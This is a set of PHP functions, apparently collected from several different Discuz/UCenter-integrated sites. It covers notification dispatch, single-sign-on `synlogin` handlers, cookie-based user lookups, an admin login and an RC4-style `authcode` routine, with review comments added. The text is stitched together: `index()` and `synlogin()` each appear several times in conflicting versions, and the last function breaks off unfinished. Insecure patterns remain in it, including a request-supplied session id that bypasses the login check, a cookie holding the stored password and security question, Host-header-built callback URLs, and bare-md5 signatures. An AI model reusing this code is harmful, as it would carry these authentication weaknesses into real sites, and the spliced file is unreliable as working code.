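/**
 * Entry point for UCenter notifications delivered over plain HTTP.
 *
 * The `code` query parameter is decoded with UC_KEY into the request fields,
 * the XML request body is parsed into $post, and the request is handed to
 * the handler method named by the `action` field. Every path ends the
 * script through exit().
 */
function index()
{
    // Only the plain HTTP notification mode is provided.
    error_reporting(0);
    set_magic_quotes_runtime(0);

    $_DCACHE = $get = $post = array();

    $code = isset($_GET['code']) ? $_GET['code'] : null;
    parse_str(_authcode($code, 'DECODE', UC_KEY), $get);
    $get = _stripslashes($get);

    // A code that does not decode leaves $get empty. Reject it before any
    // field is read; the original ran this check after the expiry test, so
    // it could never be reached for an empty payload.
    if (empty($get)) {
        exit('Invalid Request');
    }

    // Requests older than one hour are refused. A missing or non-numeric
    // `time` is treated as expired, which is what the arithmetic in the
    // original produced for those inputs.
    $timestamp = time();
    if (!isset($get['time']) || !is_numeric($get['time']) || $timestamp - $get['time'] > 3600) {
        exit('Authracation has expiried');
    }

    $action = isset($get['action']) ? $get['action'] : '';

    include ROOT_PATH . '/uc_client/lib/xml.class.php';
    $post = xml_unserialize(file_get_contents('php://input'));

    // Only these handler names may be dispatched; the strict comparison keeps
    // non-string values (parse_str can produce arrays) out of the method call.
    $handlers = array(
        'test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout',
        'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient',
        'updatecredit', 'getcreditsettings', 'updatecreditsettings',
    );
    if (is_string($action) && in_array($action, $handlers, true)) {
        // The page showed `$this->{$get}['action'](...)`, which uses the whole
        // array as the property name; the handler name is $get['action'].
        exit($this->{$action}($get, $post));
    }

    exit(API_RETURN_FAILED);
}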
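/**
 * Entry point for UCenter notifications delivered over plain HTTP.
 *
 * Does nothing when IN_UC is already defined. Otherwise the `code` query
 * parameter is decoded with UC_KEY, the XML body is parsed into $post, and
 * the handler named by the decoded `action` field is called. Every path
 * inside the guard ends the script through exit().
 */
public function index()
{
    // Plain HTTP notification mode.
    if (!defined('IN_UC')) {
        error_reporting(0);
        set_magic_quotes_runtime(0);
        defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
        service("Passport");

        $_DCACHE = $get = $post = array();

        $code = isset($_GET['code']) ? $_GET['code'] : null;
        parse_str(_authcode($code, 'DECODE', UC_KEY), $get);
        if (MAGIC_QUOTES_GPC) {
            $get = _stripslashes($get);
        }

        // Reject a payload that did not decode before reading any field from
        // it; the original tested this only after the expiry check, where an
        // empty payload had already exited.
        if (empty($get)) {
            exit('Invalid Request');
        }

        // One-hour validity window. A missing or non-numeric `time` counts as
        // expired, matching what the original arithmetic did for such input.
        $timestamp = time();
        if (!isset($get['time']) || !is_numeric($get['time']) || $timestamp - $get['time'] > 3600) {
            exit('Authracation has expiried');
        }

        $action = isset($get['action']) ? $get['action'] : '';

        require_once DISCUZ_ROOT . './uc_client/lib/xml.class.php';
        $post = xml_unserialize(file_get_contents('php://input'));

        // Allow-list of dispatchable handlers, compared strictly so that an
        // array-valued `action` can never reach the dynamic method call.
        $handlers = array(
            'test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout',
            'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient',
            'updatecredit', 'getcreditsettings', 'updatecreditsettings',
        );
        if (is_string($action) && in_array($action, $handlers, true)) {
            // The page showed `$this->{$get}['action'](...)`, which uses the
            // array itself as the property name; the handler is $get['action'].
            exit($this->{$action}($get, $post));
        }

        exit(API_RETURN_FAILED);
    }
}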
/**
 * Render the basic-information page for the account held in the hcUser cookie.
 *
 * The cookie value is passed through _authcode() and JSON-decoded; the
 * result is assigned to the template as `user`.
 */
public function view_main()
{
    $decodedCookie = _authcode($_COOKIE['hcUser']);
    $account = json_decode($decodedCookie, true);

    // NOTE(review): nothing here checks that the cookie decoded to an array;
    // a missing or undecodable cookie reaches the template as null.
    $this->smarty->assign('user', $account);
    $this->smarty->display('basicInformation.html');
}
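/**
 * Render the "authentication succeeded" page for the current distributor.
 *
 * Loads the distributor record, resolves product category ids to names,
 * assigns basic and advanced (bank / sales) fields to the template, exposes
 * the URLs of uploaded certificate images that exist on disk, and displays
 * the personal or company template depending on `type`.
 */
public function view_index()
{
    $DistributorBasicInformation = A('DistributorBasicInformation');
    $data = $DistributorBasicInformation->act_getDistributorBasicInformation();

    if ($data['status'] == '6') {
        header('Location:/index.php?mod=distributorBasicInformation&act=index');
        // Stop here: without this the rest of the method still ran and the
        // rendered page (including bank details) was sent as the body of the
        // redirect response.
        exit;
    }

    $category = $DistributorBasicInformation->act_getRootCategoryInfo();

    // The original decoded the cookie twice with identical code; once is enough.
    $loginName = json_decode(_authcode($_COOKIE['hcUser']), true);
    $loginName = $loginName['email'];

    // json_decode() yields null for empty or malformed JSON; only iterate
    // when a list actually came back.
    $data['main_products'] = json_decode($data['main_products'], true);
    $mainProducts = array();
    if (is_array($data['main_products'])) {
        foreach ($data['main_products'] as $v) {
            $mainProducts[] = $category[$v];
        }
    }

    $data['intention_products'] = json_decode($data['intention_products'], true);
    $intentionProducts = array();
    if (is_array($data['intention_products'])) {
        foreach ($data['intention_products'] as $v) {
            $intentionProducts[] = $category[$v];
        }
    }

    $this->smarty->assign(array(
        'loginName' => $loginName,
        'type' => $data['type'],
        'company' => $data['company'],
        'companyShortName' => $data['company_short_name'],
        'companyLegalPerson' => $data['company_legal_person'],
        'address' => $data['address'],
        'address2' => $data['address2'],
        'contactPerson' => $data['user_name'],
        'contactPersonPhone' => $data['phone'],
        'mainProducts' => implode(',', $mainProducts),
        'soldToCountries' => $data['sold_to_countries'],
        'intentionProducts' => implode(',', $intentionProducts),
        'contactPersonExt' => json_decode($data['contact_person_ext'], true),
        'contactPersonPhoneExt' => json_decode($data['contact_person_phone_ext'], true),
    ));

    // Picture locations.
    // NOTE(review): the directory name is the e-mail from the decoded cookie;
    // this relies on _authcode() rejecting tampered cookies - confirm.
    F("dp");
    $baseDir = C("DISTRIBUTOR_KEY_PICTURE_DIR") . $loginName . "/";
    foreach (array('idCard', 'businessLicense', 'taxRegistration') as $picture) {
        $fileName = get_getSuffixByName($picture);
        if (is_file($baseDir . $fileName)) {
            $this->smarty->assign($picture . 'Url', "/images/distributor/" . $loginName . "/" . $fileName);
        }
    }

    // Advanced information.
    $advancedData = json_decode($data['advance_data'], true);
    if (!empty($advancedData)) {
        $this->smarty->assign(array(
            'bank' => $advancedData['bank'],
            'bankName' => $advancedData['bank_name'],
            'bankUser' => $advancedData['bank_user'],
            'bankCardNo' => $advancedData['bank_card_no'],
            'compangSumPerson' => $advancedData['compang_sum_person'],
            'companyType' => $advancedData['company_type'],
            'lastYearSales' => $advancedData['last_year_sales'],
            'predictSalesByYear' => $advancedData['predict_sales_by_year'],
            'retail' => $advancedData['retail'],
            'wholesale' => $advancedData['wholesale'],
            'predictSalesByEveryMonth' => $advancedData['predict_sales_by_every_month'],
            'startElectricBusinessTime' => $advancedData['start_electric_business_time'],
            'electricBusinessPlatform' => $advancedData['electric_business_platform'],
            'otherContactPersonName' => $advancedData['other_contact_person_name'],
            'otherContactPhone' => $advancedData['other_contact_phone'],
        ));
    }

    if ($data['type'] == '1') {
        $this->smarty->display('sucAuthenticationPersonal.html');
    } else {
        $this->smarty->display('sucAuthentication.html');
    }
}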
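/**
 * Create or update the current developer's callback URL for each API id
 * submitted in $_POST (key = API id, value = callback URL).
 *
 * Sets an entry in self::$errMsg for each outcome it reports.
 *
 * @return bool false on the first failed update/insert or rejected URL, and
 *              when the cookie yields no usable developer id; true otherwise
 */
public function act_updateCallApi()
{
    $dpInfor = json_decode(_authcode($_COOKIE['hcUser']), true);

    // The developer id goes into SQL unquoted, so it must be plain digits.
    // No error code is set here: the page shows none for this situation.
    if (!is_array($dpInfor) || !isset($dpInfor['id']) || !ctype_digit((string) $dpInfor['id'])) {
        return false;
    }
    $developerId = (string) $dpInfor['id'];

    foreach ($_POST as $k => $v) {
        // The key is used as a bare number in the WHERE clause.
        // mysql_real_escape_string() gives no protection outside quotes, so
        // anything that is not a digit string is skipped instead of escaped.
        if (!ctype_digit((string) $k) || !is_string($v)) {
            continue;
        }
        $apiId = (string) $k;

        $where = 'a.is_delete=0 AND a.api_id=' . $apiId . ' AND a.developer_id=' . $developerId;
        $getApi = M('CallApi')->getDeveloperCallApi('count(*) AS num', $where);

        if ($getApi[0]['num']) {
            // Existing application: replace its callback URL.
            $callUrl = mysql_real_escape_string($this->act_filterScript($v));
            if (empty($callUrl)) {
                self::$errMsg[10138] = '申请失败,请检查输入的字符';
                return false;
            }

            $newApplyApi = array('callback_url' => $callUrl, 'application_date' => time());
            $where2 = 'is_delete=0 AND api_id=' . $apiId . ' AND developer_id=' . $developerId;
            if (!M('CallApi')->updateDeveloperCallApi($newApplyApi, $where2)) {
                self::$errMsg[10137] = get_promptmsg(10137);
                return false;
            }
            self::$errMsg[200] = get_promptmsg(200);
        } elseif (trim($v)) {
            // No application yet: create one when a URL was supplied.
            $v = mysql_real_escape_string($this->act_filterScript($v));
            if (empty($v)) {
                self::$errMsg[10139] = get_promptmsg(10139);
                return false;
            }

            $newApplyApi = array(
                'callback_url' => $v,
                'api_id' => $apiId,
                'developer_id' => $developerId,
                'application_date' => time(),
                'status' => 1,
            );
            if (!M('CallApi')->insertData($newApplyApi)) {
                self::$errMsg[10137] = get_promptmsg(10137);
                return false;
            }
            self::$errMsg[200] = get_promptmsg(200);
            // NOTE(review): kept from the original - a successful insert ends
            // the loop, while a successful update continues with the next
            // key. Confirm which behaviour is intended.
            return true;
        }
    }

    return true;
}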
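/**
 * Delete a picture from the current distributor's picture directory, chosen
 * by file-name prefix.
 *
 * The directory is C("DISTRIBUTOR_KEY_PICTURE_DIR") followed by the e-mail
 * read from the decoded hcUser cookie. The first glob() match for
 * "<directory><name>*" is removed when it is a regular file.
 *
 * @param string $name file-name prefix inside the distributor's directory
 * @return bool false when $name is rejected or unlink() fails; true when the
 *              file was removed or nothing matched
 * @author wcx
 */
function del_picByName($name)
{
    // The name is appended to a directory and then unlinked, so a value with
    // a parent-directory segment or a NUL byte must never get that far.
    if (!is_scalar($name)) {
        return false;
    }
    $name = (string) $name;
    if (strpos($name, "\0") !== false || preg_match('#(^|[/\\\\])\.\.([/\\\\]|$)#', $name)) {
        return false;
    }

    $loginName = _authcode($_COOKIE['hcUser']);
    $loginName = json_decode($loginName, true);
    $loginName = $loginName['email'];

    $baseDir = C("DISTRIBUTOR_KEY_PICTURE_DIR") . $loginName . "/";
    $tmpPic = glob($baseDir . $name . "*");
    if (empty($tmpPic)) {
        return true;
    }

    // Only the first match is considered, as before.
    $tmpPic = $tmpPic[0];
    if (is_file($tmpPic)) {
        return unlink($tmpPic);
    }

    return true;
}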
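/**
 * Back-office login.
 *
 * Looks the submitted e-mail up among non-deleted admins, verifies the
 * password through the interfacePower model and, on success, stores the
 * returned user fields in the `hcAdmin` cookie (encoded with _authcode())
 * and marks the session as logged in.
 *
 * @return bool true on success; false with self::$errMsg[10135] when the
 *              account is not found, or [10136] when the login is refused
 */
public function act_login()
{
    $userName = isset($_REQUEST['useremail']) && is_string($_REQUEST['useremail'])
        ? trim($_REQUEST['useremail'])
        : '';
    $password = isset($_REQUEST['userpassword']) && is_string($_REQUEST['userpassword'])
        ? trim($_REQUEST['userpassword'])
        : '';

    // The e-mail comes straight from the request and was concatenated into
    // the WHERE clause unescaped. Escape it for the quoted context.
    // NOTE(review): mysql_real_escape_string() needs the open connection;
    // prefer a bound parameter if the model layer offers one - confirm.
    $where = 'is_delete=0 AND email="' . mysql_real_escape_string($userName) . '"';
    $ret = M("BacksatagesLogin")->getAdmin("*", $where);
    if (empty($ret)) {
        // NOTE(review): a distinct code for "unknown account" lets a caller
        // tell existing accounts from non-existing ones.
        self::$errMsg[10135] = get_promptmsg(10135);
        return false;
    }

    $loginInfo = M("interfacePower")->userLogin($userName, $password);
    if (!$loginInfo) {
        self::$errMsg[10136] = get_promptmsg(10136);
        return false;
    }

    // Login succeeded.
    $tmp = array(
        "userId" => $loginInfo['userId'],
        "userToken" => $loginInfo['userToken'],
        "userName" => $loginInfo['userName'],
        "userCnName" => $loginInfo['userCnName'],
        "globalUserId" => $loginInfo['globalUserId'],
    );
    // NOTE(review): the cookie carries the user token and is set without the
    // HttpOnly or Secure flags; the session id is not regenerated on login.
    setcookie('hcAdmin', _authcode(json_encode($tmp), 'ENCODE'), 0, "/");
    $_SESSION['loginStatus'] = "in";
    self::$errMsg[200] = get_promptmsg(200);

    return true;
}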
/**
 * Read one field of the admin record stored in the hcAdmin cookie.
 *
 * @param string $data key to read from the decoded cookie
 * @return mixed the value stored under that key
 */
protected function userInfo($data = 'userCnName')
{
    $decoded = _authcode($_COOKIE['hcAdmin']);
    $fields = json_decode($decoded, true);

    // NOTE(review): no check that the cookie exists or decoded to an array.
    return $fields[$data];
}
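/**
 * Move the distributor's uploaded "watermark1" image into a per-platform
 * sub-directory under a new name and report the result as an AJAX response.
 *
 * Request fields: `newName` (underscores are stripped) and `shopPlat`
 * (sub-directory name). Output: array with `flag` (result of rename(), or
 * false when the request is rejected) and `imgUrl`.
 */
public function view_changWatermarkName()
{
    F("dp");
    $loginName = json_decode(_authcode($_COOKIE['hcUser']), true);
    $loginName = $loginName['email'];

    $newName = isset($_REQUEST['newName']) && is_string($_REQUEST['newName']) ? $_REQUEST['newName'] : '';
    $newName = str_replace("_", "", $newName);
    $shopPlat = isset($_REQUEST['shopPlat']) && is_string($_REQUEST['shopPlat']) ? $_REQUEST['shopPlat'] : '';

    // Both request values become path components for mkdir() and rename().
    // Each must be a single, non-empty path segment; anything carrying a
    // separator, a NUL byte or a dot-only name is refused, as is a request
    // with no decoded login name (which would target the shared root).
    $valid = is_string($loginName) && $loginName !== '';
    foreach (array($newName, $shopPlat) as $segment) {
        if ($segment === '' || $segment === '.' || $segment === '..' || strpbrk($segment, "/\\\0") !== false) {
            $valid = false;
        }
    }
    if (!$valid) {
        echo $this->ajaxReturn(array("flag" => false, "imgUrl" => ""));
        return;
    }

    $baseDir = C("DISTRIBUTOR_KEY_PICTURE_DIR") . $loginName . "/";
    $picPath = $baseDir . $shopPlat . "/";
    if (!is_dir($picPath)) {
        // NOTE(review): 0777 is kept from the original; a tighter mode is
        // preferable if only the web server needs to write here.
        mkdir($picPath, 0777);
    }

    $name = get_getSuffixByName("watermark1");
    $renameFlag = rename($baseDir . $name, $picPath . $newName . '.png');

    echo $this->ajaxReturn(array(
        "flag" => $renameFlag,
        "imgUrl" => "/images/distributor/" . $loginName . "/" . $shopPlat . "/" . $newName . '.png',
    ));
}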
/**
 * UCenter "synlogin" handler: make sure a local account exists for the user
 * and set the login cookie.
 *
 * @param array $get  decoded request fields; reads uid, username, password
 * @param array $post parsed request body (not used here)
 * @return mixed API_RETURN_FORBIDDEN when API_SYNLOGIN is off, otherwise nothing
 */
function synlogin($get, $post)
{
    session_start();

    $uid = $get['uid'];
    $username = $get['username'];

    if (!API_SYNLOGIN) {
        return API_RETURN_FORBIDDEN;
    }

    registerRole('user', $username);

    $money = daocall('setting', 'get', array('reg_user_price'));
    $existing = daocall('user', 'getUser', array($username));
    if (!$existing) {
        // First sight of this user: create the local account.
        // NOTE(review): $get['password'] is handed to newUser as received;
        // whether it is hashed at this point is not visible here.
        $newUserArgs = array($username, $get['password'], null, $username, 0, $uid, $money);
        daocall('user', 'newUser', $newUserArgs);
    }

    header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');

    $token = _authcode($uid . "\t" . $username, 'ENCODE');
    _setcookie('Example_auth', $token);
}
/**
 * Serialise an array as "&key=value&key=value..." and encode the result
 * with _authcode() under UC_KEY.
 *
 * @param array $get key/value pairs to serialise
 * @return mixed whatever _authcode() returns for the serialised string
 */
function encode_arr($get)
{
    // NOTE(review): keys and values are joined without URL-encoding, so a
    // value containing '&' or '=' changes the field structure seen by a
    // parse_str() consumer. Confirm callers pre-encode before relying on it.
    $pairs = array();
    foreach ($get as $key => $val) {
        $pairs[] = $key . '=' . $val;
    }

    $serialised = $pairs ? '&' . implode('&', $pairs) : '';

    return _authcode($serialised, 'ENCODE', UC_KEY);
}
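/**
 * UCenter "synlogin" handler: log the named member in locally, registering
 * the account first when it does not exist, then set the login cookie.
 *
 * @param array $get  decoded request fields; reads uid, username, password
 * @param array $post parsed request body (not used here)
 * @return mixed API_RETURN_FORBIDDEN when API_SYNLOGIN is off, otherwise nothing
 */
function synlogin($get, $post)
{
    $uid = $get['uid'];
    $username = $get['username'];
    if (!API_SYNLOGIN) {
        return API_RETURN_FORBIDDEN;
    }

    // parse_str() can deliver arrays; the name is used as a plain string.
    $username = is_scalar($username) ? (string) $username : '';

    // Array conditions let the model quote the value; the original
    // interpolated the user name into the WHERE string.
    $vo = M("members")->field("id,user_name")->where(array('user_name' => $username))->find();
    if (is_array($vo)) {
        // Log in.
        foreach ($vo as $key => $v) {
            session("u_{$key}", $v);
        }
        $up = array();
        $up['uid'] = $vo['id'];
        $up['add_time'] = time();
        $up['ip'] = get_client_ip();
        M('member_login')->add($up);
    } else {
        // Register.
        require_once DISCUZ_ROOT . "uc_client/client.php";
        $dataUc = uc_get_user($username);
        // Anything other than an array carries no e-mail to copy.
        $email = is_array($dataUc) && isset($dataUc[2]) ? $dataUc[2] : '';

        $data = array();
        $data['user_name'] = text($username);
        // NOTE(review): the password from the request is stored as received;
        // whether it is already hashed is not visible here - confirm.
        $data['user_pass'] = text($get['password']);
        $data['user_email'] = text($email);

        // Refuse to create a second account with the same e-mail or name.
        $duplicate = array(
            'user_email' => $data['user_email'],
            'user_name' => $data['user_name'],
            '_logic' => 'OR',
        );
        $count = M('members')->where($duplicate)->count('id');
        if ($count > 0) {
            exit;
        }

        $data['reg_time'] = time();
        $data['reg_ip'] = get_client_ip();
        $data['lastlog_time'] = time();
        $data['lastlog_ip'] = get_client_ip();
        $newid = M('members')->add($data);
        if ($newid) {
            session('u_id', $newid);
            session('u_user_name', $data['user_name']);
            Notice(1, $newid);
            memberMoneyLog($newid, 1, $this->glo['award_reg'], "注册奖励");
        }
    }

    header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
    _setcookie('Example_auth', _authcode($uid . "\t" . $username, 'ENCODE'));
}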
/**
 * Controller bootstrap: starts the session, configures Smarty, decodes the
 * hcAdmin / hcUser cookies, runs the login check when C('IS_AUTH_ON') is
 * true, and publishes request and user values to the template.
 *
 * NOTE(review): when the request carries a PHPSESSID parameter, only
 * session_id() is called and everything in the else-branch is skipped -
 * that includes the login check and all template/user initialisation.
 * session_id() is also called after session_start() has already run, and
 * with a request-supplied value. Confirm this path is intended and that it
 * cannot be used to reach actions without the login check.
 */
public function __construct()
{
    @session_start();
    $mod = @trim($_GET['mod']);
    $act = @trim($_GET['act']);

    #################### Smarty initialisation: start ####################
    require WEB_PATH . 'lib/template/smarty/Smarty.class.php';
    $this->smarty = new Smarty();
    $this->smarty->template_dir = WEB_PATH . 'html/template/v1' . DIRECTORY_SEPARATOR; // template directory
    $this->smarty->compile_dir = WEB_PATH . 'smarty/templates_c' . DIRECTORY_SEPARATOR; // compiled-template directory
    $this->smarty->config_dir = WEB_PATH . 'smarty/configs' . DIRECTORY_SEPARATOR; // configuration directory
    $this->smarty->cache_dir = WEB_PATH . 'smarty/cache' . DIRECTORY_SEPARATOR; // cache directory
    $this->smarty->debugging = false;
    $this->smarty->caching = false;
    $this->smarty->cache_lifetime = 120;
    #################### Smarty initialisation: end ####################

    // Errors from json_decode() are suppressed; an absent or undecodable
    // cookie leaves the variable empty.
    $hcAdmin = @json_decode(_authcode($_COOKIE['hcAdmin']), true);
    $hcUser = @json_decode(_authcode($_COOKIE['hcUser']), true);

    if (isset($_REQUEST["PHPSESSID"])) {
        session_id($_REQUEST["PHPSESSID"]);
    } else {
        if (C('IS_AUTH_ON') === true) {
            // Access control.
            if (empty($hcAdmin) && empty($hcUser)) {
                include_once WEB_PATH . 'lib/class/authuser.class.php';
                $_SESSION['loginStatus'] = "out"; // mark the session as logged out
                // Login check.
                if (!AuthUser::checkLogin($mod, $act)) {
                    redirect_to(WEB_URL . "index.php?mod=index&act=index");
                }
            }
            // Same check again whenever there is no front-end user cookie,
            // even if an admin cookie is present.
            if (empty($hcUser)) {
                include_once WEB_PATH . 'lib/class/authuser.class.php';
                $_SESSION['loginStatus'] = "out"; // mark the session as logged out
                // Login check.
                if (!AuthUser::checkLogin($mod, $act)) {
                    redirect_to(WEB_URL . "index.php?mod=index&act=index");
                }
            }
            if (!empty($hcUser)) {
                // Front-end login information.
                $loginName = $hcUser['email'];
            }
        } else {
            $loginName = $hcUser['email'];
        }
        $this->smarty->assign(array("loginName" => $loginName));

        // Remember the current page so a later login can return to it.
        // NOTE(review): the URL is built from the Host header and stored in
        // a cookie; whoever redirects to it should validate the target.
        if (!in_array($act, array('login', 'logout', 'userLogin'))) {
            $now_url = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // current page URL
            setcookie('now_url', $now_url, time() + 86400);
        }

        // Original comment: the following three variables are written to
        // SESSION on successful login.
        $this->_username = isset($hcUser['email']) ? $hcUser['email'] : (isset($hcAdmin['userCnName']) ? $hcAdmin['userCnName'] : "XX"); // display name of the logged-in user
        $this->_userid = isset($hcUser['id']) ? $hcUser['id'] : (isset($hcAdmin['userId']) ? $hcAdmin['userId'] : 0);
        $this->_companyid = isset($_SESSION['companyId']) ? $_SESSION['companyId'] : 0;
        $this->_systemid = '12';

        // Echo submitted GET and POST values back to the template so search
        // conditions and form fields survive a reload.
        // NOTE(review): raw request values are assigned as g_* / p_*; the
        // templates must escape them on output - confirm.
        if (isset($_GET)) {
            foreach ($_GET as $gk => $gv) {
                $this->smarty->assign('g_' . $gk, $gv);
            }
        }
        if (isset($_POST)) {
            foreach ($_POST as $pk => $pv) {
                $this->smarty->assign('p_' . $pk, $pv);
            }
        }

        $this->smarty->assign('curusername', @$_SESSION['userName']); // current user name
        $this->smarty->assign('mod', $mod); // module
        $this->smarty->assign('act', $act); // action
        $this->smarty->assign('_username', $this->_username); // display name
        $this->smarty->assign('_userid', $this->_userid); // user id
        $this->smarty->assign('loginStatus', $_SESSION['loginStatus']); // login status

        // Current page number: a positive integer from ?page=, else 1.
        $this->page = isset($_GET['page']) && intval($_GET['page']) > 0 ? intval($_GET['page']) : 1;
        $this->smarty->assign("page", $this->page);
    }
}
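/**
 * UCenter "synlogin" handler: set the application's auth cookie and notify
 * the application's own User/uc_synlogin action over HTTP.
 *
 * @param array $get  decoded request fields; reads uid and username
 * @param array $post parsed request body (not used here)
 * @return mixed API_RETURN_FORBIDDEN when API_SYNLOGIN is off, otherwise nothing
 */
function synlogin($get, $post)
{
    $uid = $get['uid'];
    $username = $get['username'];
    if (!API_SYNLOGIN) {
        return API_RETURN_FORBIDDEN;
    }

    header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');

    $auth = _authcode($uid . "\t" . $username, 'ENCODE', $this->_tp_conf['AUTH']);
    setcookie($this->_tp_conf['COOKIE_PREFIX'] . 'auth', $auth, 0, __ROOT__);

    $time = time();
    // NOTE(review): the callback URL is built from the Host request header,
    // so the signed request below is sent wherever that header points.
    // A configured base URL would remove that dependency.
    $url = 'http://' . $_SERVER['HTTP_HOST'] . __ROOT__ . 'index.php';

    // The page showed the username operand masked as ****** (which does not
    // parse). $username is the value the signature below is computed over.
    // NOTE(review): confirm against the original file. uid and username are
    // not URL-encoded here, and the signature is a bare md5 over
    // concatenated fields rather than an HMAC.
    $data = 'm=User&a=uc_synlogin&uid=' . $uid
        . '&username=' . $username
        . '&time=' . $time
        . '&auth=' . md5($uid . $username . $time . $this->_tp_conf['AUTH']);

    _dCurl($url, $data, false);
}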
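/**
 * Encode or decode a string with the Discuz-style "authcode" scheme.
 *
 * ENCODE prepends a 10-digit expiry timestamp and a 16-character check value
 * (truncated md5 of plaintext + key half) to the plaintext, runs the result
 * through an RC4-style keystream derived from the key and a 4-character
 * per-message prefix, and returns prefix + unpadded base64. DECODE reverses
 * this and returns the plaintext only when the expiry and check value hold.
 * Input to DECODE and output of ENCODE additionally pass through
 * _authcode(), whose transformation is not visible here.
 *
 * NOTE(review): RC4 and a 64-bit truncated md5 check value are legacy
 * constructions, kept here for wire compatibility. New designs should use an
 * authenticated encryption primitive.
 *
 * @param string $string    text to encode, or token to decode
 * @param string $operation 'DECODE' (default) or anything else for encode
 * @param string $key       secret; falls back to $_G['authkey'] when empty
 * @param int    $expiry    lifetime in seconds, 0 for no expiry
 * @return string decoded plaintext, '' when verification fails, or the
 *                encoded token
 */
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0)
{
    global $_G;

    $ckey_length = 4;
    $operation = strtoupper($operation);
    $decoding = $operation === 'DECODE';

    if ($decoding) {
        $string = _authcode($string, true);
    }

    $key = md5($key != '' ? $key : $_G['authkey']);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    // Per-message prefix: read from the token when decoding, derived from
    // the current time when encoding.
    $keyc = $ckey_length
        ? ($decoding ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length))
        : '';

    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);

    $string = $decoding
        ? base64_decode(substr($string, $ckey_length))
        : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

    // Key scheduling.
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    // Keystream generation and XOR.
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ $box[($box[$a] + $box[$j]) % 256]);
    }

    if ($decoding) {
        // The original compared both the expiry and the check value with
        // `==`. For two hex strings that is a numeric comparison whenever
        // both look like numbers ("0e..." forms), so distinct check values
        // could compare equal. Compare the check value as exact strings, in
        // constant time where available, and parse the expiry explicitly.
        $expires = (int) substr($result, 0, 10);
        $given = (string) substr($result, 10, 16);
        $expected = substr(md5((string) substr($result, 26) . $keyb), 0, 16);

        $fresh = $expires === 0 || $expires - time() > 0;
        $authentic = function_exists('hash_equals')
            ? hash_equals($expected, $given)
            : $expected === $given;

        if ($fresh && $authentic) {
            return substr($result, 26);
        }

        return '';
    }

    $rs = $keyc . str_replace('=', '', base64_encode($result));

    return _authcode($rs, false);
}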
/**
 * UCenter "synlogin" handler: set the `ly_auth` login cookie for the user.
 *
 * @param array $get  decoded request fields; reads uid and username
 * @param array $post parsed request body (not used here)
 * @return mixed API_RETURN_FORBIDDEN when API_SYNLOGIN is off, otherwise nothing
 */
function synlogin($get, $post)
{
    $uid = $get['uid'];
    $username = $get['username'];

    if (!API_SYNLOGIN) {
        return API_RETURN_FORBIDDEN;
    }

    header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');

    // Cookie payload is "<uid>\t<username>", encoded by _authcode().
    $payload = $uid . "\t" . $username;
    _setcookie('ly_auth', _authcode($payload, 'ENCODE'));
}
/**
 * UCenter "synlogin" handler for a Discuz forum: set the forum login cookies
 * for an existing member, or the activation cookies when the uid is unknown.
 *
 * @param array $get  decoded request fields; reads uid and username
 * @param array $post parsed request body (not used here)
 * @return mixed API_RETURN_FORBIDDEN when API_SYNLOGIN is off, otherwise nothing
 */
function synlogin($get, $post)
{
    $uid = $get['uid'];
    $username = $get['username'];

    if (!API_SYNLOGIN) {
        return API_RETURN_FORBIDDEN;
    }

    // The settings cache populates $_DCACHE in this scope.
    require_once $this->appdir . './forumdata/cache/cache_settings.php';

    $cookietime = 2592000;
    // The cookie key is bound to the client's User-Agent string.
    $discuz_auth_key = md5($_DCACHE['settings']['authkey'] . $_SERVER['HTTP_USER_AGENT']);

    header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');

    // The uid is forced to an integer before it reaches the query.
    $uid = intval($uid);
    $result = $this->db->query("SELECT username, uid, password, secques FROM " . $this->tablepre . "members WHERE uid='{$uid}'");
    $row = $this->db->fetch_array($result);

    if (!$row) {
        // Unknown uid: hand the client what it needs to activate the account.
        _setcookie('cookietime', $cookietime, 31536000);
        _setcookie('loginuser', $username, $cookietime);
        _setcookie('activationauth', _authcode($username, 'ENCODE', $discuz_auth_key), $cookietime);
        return;
    }

    // Known member: drop the old session id and issue the auth cookie.
    // NOTE(review): the auth cookie payload contains the stored password
    // value and security question, encoded with _authcode().
    _setcookie('sid', '', -86400 * 365);
    _setcookie('cookietime', $cookietime, 31536000);
    $authPayload = "{$row['password']}\t{$row['secques']}\t{$row['uid']}";
    _setcookie('auth', _authcode($authPayload, 'ENCODE', $discuz_auth_key), $cookietime);
}
/**
 * Return one field of the admin record stored in the hcAdmin cookie.
 *
 * @param string $flag key to read from the decoded cookie
 * @return mixed the value stored under that key
 */
public function act_getAdminInfor($flag = 'userCnName')
{
    $cookiePlain = _authcode($_COOKIE['hcAdmin']);
    $admin = json_decode($cookiePlain, true);

